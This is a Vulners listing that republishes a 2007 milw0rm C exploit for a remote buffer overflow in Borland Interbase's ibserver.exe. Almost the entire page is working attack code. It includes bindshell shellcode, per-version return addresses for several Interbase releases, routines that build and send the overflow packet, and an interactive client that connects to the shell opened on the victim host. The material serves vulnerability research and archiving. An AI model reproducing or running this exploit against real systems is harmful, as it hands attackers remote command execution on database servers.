Vulners
Lucene search
Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit
/*
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html
Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P
All your base are belong to FD2K2!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
#define IB_PORT "3050"
// 0xFF - 0x8, jmp 8 bytes back
#define JMP "\x90\x90\xEB\xF7"
// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode
CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";
// BIG_JMP SIZE
#define BIG_JMP_SIZE 5
CHAR ASCII_SHIT[]=
"\r\n >__ _ ___\r\n"
" / __\\26/07/2007| | __ / __\\ ___ _ __ ___ \r\n"
" /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"
" / \\/ \\ (_| | (__| </ \\/ \\ (_) | | | | __/\r\n"
" \\_____/\\__,_|\\___|_|\\_\\_____/\\___/|_| |_|\\___>\r\n"
" _______________BackBone_(c)_2007_______\r\n\r\n";
struct
{
char* cVersion;
DWORD dwRet;
DWORD dwLength1;
DWORD dwLength2;
}
targets[]=
{
{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123
{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129
{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181
{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6
},v;
// don't change the offset
#define PORT_OFFSET 170
#define BIND_PORT 10282
// bindshell shellcode from www.metasploit.com,mod by skylined
unsigned char shellcode[] =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
"\x83\xc4\x5c\x61\xeb\x89";
#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
unsigned long lookupaddress(const char* pchost)
{
unsigned long nremoteaddr = inet_addr(pchost);
if (nremoteaddr == INADDR_NONE)
{
struct hostent* phe = gethostbyname(pchost);
if (phe == 0)
return INADDR_NONE;
nremoteaddr = *((u_long*)phe->h_addr_list[0]);
}
return nremoteaddr;
}
void showusage(char* argv)
{
int i;
printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);
printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);
printf("[*] Targets:\r\n\r\n");
for (i=0;i<(sizeof(targets)/sizeof(v));i++)
printf("\t%2d: %s\r\n",i,targets[i].cVersion);
}
void showinfo(void)
{
printf("%s",ASCII_SHIT);
printf(" Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");
printf(" Advisory provided by TPTI-07-13.\r\n");
printf(" Exploit by BackBone.\r\n\r\n");
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while(1)
{
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set*)&ul,NULL,NULL,&time);
if(l==1)
{
l=recv(sock,buf,sizeof(buf),0);
if (l<=0)
{
printf("\r\n[-] connection closed.\n");
return;
}
l=write(1,buf,l);
if (l<=0)
{
printf("\r\n[-] connection closed.\n");
return;
}
}
else
{
l=read(0,buf,sizeof(buf));
if (l<=0)
{
printf("\r\n[-] connection closed.\n");
return;
}
l=send(sock,buf,l,0);
if (l<=0)
{
printf("\r\n[-] connection closed.\n");
return;
}
}
}
}
int main(int argc, char *argv[])
{
char *host,*port;
unsigned long ulip;
WSADATA wsa;
SOCKET s;
struct sockaddr_in sock_in;
char buffer[16384];
int bind,type;
unsigned int size=0;
DWORD dwLen1,dwLen2;
DWORD dwBigJmp=0xFFFFFFFF;
int i;
showinfo();
if (argc<3 || argc>4)
{
showusage(argv[0]);
return -1;
}
host=strtok(argv[1],":");
if((port=strtok(NULL,":"))==0)
port=IB_PORT;
if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)
{
printf("[-] WSAStartup() error.\r\n");
return -1;
}
ulip=lookupaddress(host);
if (ulip==INADDR_ANY || ulip==INADDR_NONE)
{
printf("[-] invalid ip or host.\r\n");
return -1;
}
if (atoi(port)<0 || atoi(port)>65534)
{
printf("[-] invalid port.\r\n");
return -1;
}
type=atoi(argv[2]);
if (type>(sizeof(targets)/sizeof(v))-1 || type<0)
{
printf("[-] invalid target type.\r\n");
return -1;
}
printf("[+] Target: %s\r\n",targets[type].cVersion);
bind=BIND_PORT;
if (argc==4)
{
if (atoi(argv[3])>0 && atoi(argv[3])<65535)
bind=atoi(argv[3]);
}
SET_BIND_PORT(bind);
s=socket(AF_INET, SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{
printf("[-] socket() error.\r\n",s);
return -1;
}
sock_in.sin_port=htons((u_short)atoi(port));
sock_in.sin_family=AF_INET;
sock_in.sin_addr.s_addr=ulip;
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
{
printf("Failed!\r\n");
closesocket(s);
WSACleanup();
return -1;
}
printf("Ok.\r\n");
// constructing the buffer
memset(buffer,0,16384);
memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);
size+=8;
dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));
memcpy(buffer+size,&dwLen1,sizeof(DWORD));
size+=sizeof(DWORD);
memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));
size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);
// shellcode
memcpy(buffer+size,shellcode,sizeof(shellcode));
size+=sizeof(shellcode);
// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)
dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;
// prepare jump code
memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));
// write big jump code
memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);
size+=BIG_JMP_SIZE;
// jmp 8 bytes back
memcpy(buffer+size,JMP,sizeof(DWORD));
size+=sizeof(DWORD);
// return addr
memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));
size+=sizeof(DWORD);
memset(buffer+size,0xFF,sizeof(DWORD));
size+=sizeof(DWORD);
dwLen2=htonl(targets[type].dwLength2);
memcpy(buffer+size,&dwLen2,sizeof(DWORD));
size+=sizeof(DWORD);
memset(buffer+size,0x90,targets[type].dwLength2);
size+=targets[type].dwLength2;
printf("[+] Sending buffer (len: %u) ... ",size);
if (!send(s,buffer,size,0))
{
printf("Failed.\r\n");
closesocket(s);
WSACleanup();
return -1;
}
printf("Ok.\r\n");
closesocket(s);
Sleep(1000);
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
(ulip>>16)&0xff,(ulip>>24)&0xff,bind);
s=socket(AF_INET, SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{
printf("socket() error.\r\n",s);
WSACleanup();
return -1;
}
sock_in.sin_port=htons((u_short)bind);
sock_in.sin_family=AF_INET;
sock_in.sin_addr.s_addr=ulip;
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
{
printf("Failed!\r\n");
closesocket(s);
WSACleanup();
return -1;
}
printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");
shell(s);
closesocket(s);
WSACleanup();
return 0;
}
// milw0rm.com [2007-07-30]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1